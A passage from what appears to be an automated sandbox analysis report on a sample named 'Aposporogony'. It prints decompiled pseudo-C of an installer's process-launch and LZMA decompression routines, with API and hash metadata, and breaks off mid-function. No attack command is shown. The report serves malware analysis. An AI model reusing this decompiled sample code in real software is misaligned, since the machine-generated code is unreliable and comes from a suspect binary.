                                                                                                                                                                                      • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E004059D1(WCHAR* _a4) {
                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                                      				int _t7;
                                                                                                                                                                                      
                                                                                                                                                                                      				0x426730->cb = 0x44;
                                                                                                                                                                                      				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20); // executed
                                                                                                                                                                                      				if(_t7 != 0) {
                                                                                                                                                                                      					CloseHandle(_v20.hThread);
                                                                                                                                                                                      					return _v20.hProcess;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x004059da
                                                                                                                                                                                      0x004059fa
                                                                                                                                                                                      0x00405a02
                                                                                                                                                                                      0x00405a07
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405a0d
                                                                                                                                                                                      0x00405a11

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Error launching installer, xrefs: 004059E4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                                                                      • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                                                                      • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 99%
                                                                                                                                                                                      			E00406F27() {
                                                                                                                                                                                      				signed int _t530;
                                                                                                                                                                                      				void _t537;
                                                                                                                                                                                      				signed int _t538;
                                                                                                                                                                                      				signed int _t539;
                                                                                                                                                                                      				unsigned short _t569;
                                                                                                                                                                                      				signed int _t579;
                                                                                                                                                                                      				signed int _t607;
                                                                                                                                                                                      				void* _t627;
                                                                                                                                                                                      				signed int _t628;
                                                                                                                                                                                      				signed int _t635;
                                                                                                                                                                                      				signed int* _t643;
                                                                                                                                                                                      				void* _t644;
                                                                                                                                                                                      
                                                                                                                                                                                      				L0:
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L0:
                                                                                                                                                                                      					_t530 =  *(_t644 - 0x30);
                                                                                                                                                                                      					if(_t530 >= 4) {
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *(_t644 - 0x40) = 6;
                                                                                                                                                                                      					 *(_t644 - 0x7c) = 0x19;
                                                                                                                                                                                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						L145:
                                                                                                                                                                                      						 *(_t644 - 0x50) = 1;
                                                                                                                                                                                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L149:
                                                                                                                                                                                      							if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                                                      								goto L155;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L150:
                                                                                                                                                                                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                                                                                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                                                                                      							 *(_t644 - 0x54) = _t643;
                                                                                                                                                                                      							_t569 =  *_t643;
                                                                                                                                                                                      							_t635 = _t569 & 0x0000ffff;
                                                                                                                                                                                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                                                                                      							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                                                                                      								_t628 = _t627 + 1;
                                                                                                                                                                                      								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                                                                                      								 *(_t644 - 0x50) = _t628;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(_t644 - 0x10) = _t607;
                                                                                                                                                                                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                                                                                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      								L148:
                                                                                                                                                                                      								_t487 = _t644 - 0x48;
                                                                                                                                                                                      								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                                                                                      								L149:
                                                                                                                                                                                      								if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                                                      									goto L155;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L150;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L154:
                                                                                                                                                                                      								L146:
                                                                                                                                                                                      								if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                      									L169:
                                                                                                                                                                                      									 *(_t644 - 0x88) = 0x18;
                                                                                                                                                                                      									L170:
                                                                                                                                                                                      									_t579 = 0x22;
                                                                                                                                                                                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                                                                                      									_t539 = 0;
                                                                                                                                                                                      									L172:
                                                                                                                                                                                      									return _t539;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L147:
                                                                                                                                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                                                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                      								_t484 = _t644 - 0x70;
                                                                                                                                                                                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								goto L148;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L155:
                                                                                                                                                                                      							_t537 =  *(_t644 - 0x7c);
                                                                                                                                                                                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L140:
                                                                                                                                                                                      								 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L1:
                                                                                                                                                                                      									_t538 =  *(_t644 - 0x88);
                                                                                                                                                                                      									if(_t538 > 0x1c) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L2:
                                                                                                                                                                                      									switch( *((intOrPtr*)(_t538 * 4 +  &M00407395))) {
                                                                                                                                                                                      										case 0:
                                                                                                                                                                                      											L3:
                                                                                                                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L4:
                                                                                                                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                      											_t538 =  *( *(_t644 - 0x70));
                                                                                                                                                                                      											if(_t538 > 0xe1) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L5:
                                                                                                                                                                                      											_t542 = _t538 & 0x000000ff;
                                                                                                                                                                                      											_push(0x2d);
                                                                                                                                                                                      											asm("cdq");
                                                                                                                                                                                      											_pop(_t581);
                                                                                                                                                                                      											_push(9);
                                                                                                                                                                                      											_pop(_t582);
                                                                                                                                                                                      											_t638 = _t542 / _t581;
                                                                                                                                                                                      											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                                                                                                                      											asm("cdq");
                                                                                                                                                                                      											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                                                                                                                      											 *(_t644 - 0x3c) = _t633;
                                                                                                                                                                                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                                                                                                                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                                                                                                                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                                                                                                                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                                                                                                                      												L10:
                                                                                                                                                                                      												if(_t641 == 0) {
                                                                                                                                                                                      													L12:
                                                                                                                                                                                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                                                                                                                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                                                                                      													goto L15;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L11;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												do {
                                                                                                                                                                                      													L11:
                                                                                                                                                                                      													_t641 = _t641 - 1;
                                                                                                                                                                                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                                                                                                                      												} while (_t641 != 0);
                                                                                                                                                                                      												goto L12;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L6:
                                                                                                                                                                                      											if( *(_t644 - 4) != 0) {
                                                                                                                                                                                      												GlobalFree( *(_t644 - 4));
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                      											 *(_t644 - 4) = _t538;
                                                                                                                                                                                      											if(_t538 == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                                                                                                                      												goto L10;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 1:
                                                                                                                                                                                      											L13:
                                                                                                                                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                                                                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                      												L157:
                                                                                                                                                                                      												 *(_t644 - 0x88) = 1;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L14:
                                                                                                                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                                                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                      											_t45 = _t644 - 0x48;
                                                                                                                                                                                      											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                                                                                                                      											__eflags =  *_t45;
                                                                                                                                                                                      											L15:
                                                                                                                                                                                      											if( *(_t644 - 0x48) < 4) {
                                                                                                                                                                                      												goto L13;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L16:
                                                                                                                                                                                      											_t550 =  *(_t644 - 0x40);
                                                                                                                                                                                      											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                                                                                                                      												L20:
                                                                                                                                                                                      												 *(_t644 - 0x48) = 5;
                                                                                                                                                                                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                      												goto L23;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L17:
                                                                                                                                                                                      											 *(_t644 - 0x74) = _t550;
                                                                                                                                                                                      											if( *(_t644 - 8) != 0) {
                                                                                                                                                                                      												GlobalFree( *(_t644 - 8));
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                                                                                                                      											 *(_t644 - 8) = _t538;
                                                                                                                                                                                      											if(_t538 == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L20;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 2:
                                                                                                                                                                                      											L24:
                                                                                                                                                                                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                                                                                                                      											 *(_t644 - 0x84) = 6;
                                                                                                                                                                                      											 *(_t644 - 0x4c) = _t557;
                                                                                                                                                                                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                                                                                                                      											goto L132;
                                                                                                                                                                                      										case 3:
                                                                                                                                                                                      											L21:
                                                                                                                                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                                                                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                      												L158:
                                                                                                                                                                                      												 *(_t644 - 0x88) = 3;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L22:
                                                                                                                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                      											_t67 = _t644 - 0x70;
                                                                                                                                                                                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                      											__eflags =  *_t67;
                                                                                                                                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L23:
                                                                                                                                                                                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                                                                                                                      											if( *(_t644 - 0x48) != 0) {
                                                                                                                                                                                      												goto L21;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L24;
                                                                                                                                                                                      										case 4:
                                                                                                                                                                                      											L133:
                                                                                                                                                                                      											_t559 =  *_t642;
                                                                                                                                                                                      											_t626 = _t559 & 0x0000ffff;
                                                                                                                                                                                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                                                                                                                      											if( *(_t644 - 0xc) >= _t596) {
                                                                                                                                                                                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                                                                                                                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                                                                                                                      												 *(_t644 - 0x40) = 1;
                                                                                                                                                                                      												_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                                                      												__eflags = _t560;
                                                                                                                                                                                      												 *_t642 = _t560;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(_t644 - 0x10) = _t596;
                                                                                                                                                                                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                                                                                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L139;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L137;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 5:
                                                                                                                                                                                      											L137:
                                                                                                                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                      												L168:
                                                                                                                                                                                      												 *(_t644 - 0x88) = 5;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L138:
                                                                                                                                                                                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L139:
                                                                                                                                                                                      											_t537 =  *(_t644 - 0x84);
                                                                                                                                                                                      											L140:
                                                                                                                                                                                      											 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                      											goto L1;
                                                                                                                                                                                      										case 6:
                                                                                                                                                                                      											L25:
                                                                                                                                                                                      											__edx = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												L36:
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												goto L132;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L26:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                      											__cl = 8;
                                                                                                                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                      											__ecx =  *(__ebp - 4);
                                                                                                                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                      													_t98 = __ebp - 0x38;
                                                                                                                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                      													__eflags =  *_t98;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                      												L35:
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												__ebx = 1;
                                                                                                                                                                                      												goto L61;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												L32:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 8);
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												__ebx = 1;
                                                                                                                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      												goto L41;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 7:
                                                                                                                                                                                      											L66:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                      												L68:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eax = 0;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      												goto L69;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L67:
                                                                                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      											goto L132;
                                                                                                                                                                                      										case 8:
                                                                                                                                                                                      											L70:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                      												 *(__ebp - 0x84) = 9;
                                                                                                                                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L132;
                                                                                                                                                                                      										case 9:
                                                                                                                                                                                      											L73:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												goto L90;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L74:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L75:
                                                                                                                                                                                      											__eax = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                      											__eflags = _t259;
                                                                                                                                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                                      											goto L76;
                                                                                                                                                                                      										case 0xa:
                                                                                                                                                                                      											L82:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												L84:
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												goto L132;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L83:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      											goto L89;
                                                                                                                                                                                      										case 0xb:
                                                                                                                                                                                      											L85:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      											L89:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      											L90:
                                                                                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      											goto L69;
                                                                                                                                                                                      										case 0xc:
                                                                                                                                                                                      											L99:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												L164:
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xc;
